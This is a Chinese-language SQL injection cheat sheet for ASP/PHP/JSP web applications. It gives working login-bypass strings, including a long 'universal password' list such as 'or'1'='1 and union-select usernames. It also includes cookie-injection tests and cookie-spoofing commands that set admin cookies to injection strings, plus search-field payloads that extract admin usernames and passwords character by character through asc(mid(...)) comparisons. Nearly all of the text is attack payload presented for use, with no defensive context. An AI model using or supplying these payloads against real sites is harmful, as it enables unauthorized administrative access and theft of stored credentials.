另类登录注入形式:
经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。 猜解思路可以构造,user_name: xxx' and password>'a 如果password第一位大于a,则继续user_name: xxx' and password>'b.
seelct * from admin where username='admin' and password=''注入方法:
万能用户名: xxx' union select * from users/*
select * from admin where username=admin and password=pass注入方法:
账户:777 密码:999 union select * from admin;
万能密码:
用户名:admin'or'1'='1 密码:'or'2'='2 username:' or 1=1 or ''=' passwd:随便写 'or'='or' 'or''=' 'or 1=1 "or"=" 'or 1=1/* php "or "a"="a "or 1=1-- "or"=" "or"="a'='a "or1=1-- "or=or" ''or'='or' ') or ('a'='a '.).or.('.a.'='.a 'or 1=1 'or 1=1-- 'or 1=1/* 'or"="a'='a 'or' '1'='1' 'or''=' 'or''=''or''=' !!!!! 'or'='1' 'or'='or' 'or.'a.'='a 'or1=1-- 1'or'1'='1 a'or' 1=1-- a'or'1=1-- or 'a'='a' or 1=1-- or1=1--
cookie注入:
http://xxxx/view.asp?id=23 先访问http://xxxx/view.asp?id=23 接着在浏览器里输入: javascript:alert(document.cookie="id="+escape("23 and 1=1")) 再访问http://xxxx/view.asp(未出错) 再输入:javascript:alert(document.cookie="id="+escape("23 and 1=2")) 再访问:http://xxxx/view.asp(出错) 该页面出错就表示可以用Cookie注入。
cookie欺骗
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
然后login.asp改为admin_index.asp
搜索型注入
例如: 判断注入 1%' and 1=1 and '%' =' 1%' and 1=2 and '%' =' 判断是否存在表 1%'and(select count(*)from admin)>0 and '%'=' 判断是否存在字段段 1%'and(select top 1 len(username)from admin) and '%'=' 1%'and(select top 1 len(password)from admin) and '%'=' 猜字段中的内容范围 1%'and(select top 1 asc(mid(username,1,1))from admin)>102 and '%'=' 1%'and(select top 1 asc(mid(username,1,1))from admin)>40 and '%'=' 1%'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'=' 1%'and(select top 1 asc(mid(username,2,1))from admin)=100 and '%'=' 1%'and(select top 1 asc(mid(username,3,1))from admin)=109 and '%'=' 1%'and(select top 1 asc(mid(username,4,1))from admin)=105 and '%'=' 1%'and(select top 1 asc(mid(username,5,1))from admin)=110 and '%'=' 1%'and(select top 1 asc(mid(password,1,1))from admin)=49 and '%'=' 1%'and(select top 1 asc(mid(password,2,1))from admin)=52 and '%'=' 1%'and(select top 1 asc(mid(password,3,1))from admin)=50 and '%'=' 1%'and(select top 1 asc(mid(password,4,1))from admin)=49 and '%'=' 1%'and(select top 1 asc(mid(password,5,1))from admin)=53 and '%'=' 1%'and(select top 1 asc(mid(password,6,1))from admin)=68 and '%'=' 1%'and(select top 1 asc(mid(password,7,1))from admin)=51 and '%'=' 1%'and(select top 1 asc(mid(password,8,1))from admin)=49 and '%'=' 1%'and(select top 1 asc(mid(password,9,1))from admin)=50 and '%'=' 1%'and(select top 1 asc(mid(password,10,1))from admin)=49 and '%'=' 1%'and(select top 1 asc(mid(password,11,1))from admin)=57 and '%'=' 1%'and(select top 1 asc(mid(password,12,1))from admin)=52 and '%'=' 1%'and(select top 1 asc(mid(password,13,1))from admin)=43 and '%'=' 1%'and(select top 1 asc(mid(password,14,1))from admin)=51 and '%'=' 1%'and(select top 1 asc(mid(password,15,1))from admin)=68 and '%'=' 1%'and(select top 1 asc(mid(password,16,1))from admin)=51 and '%'='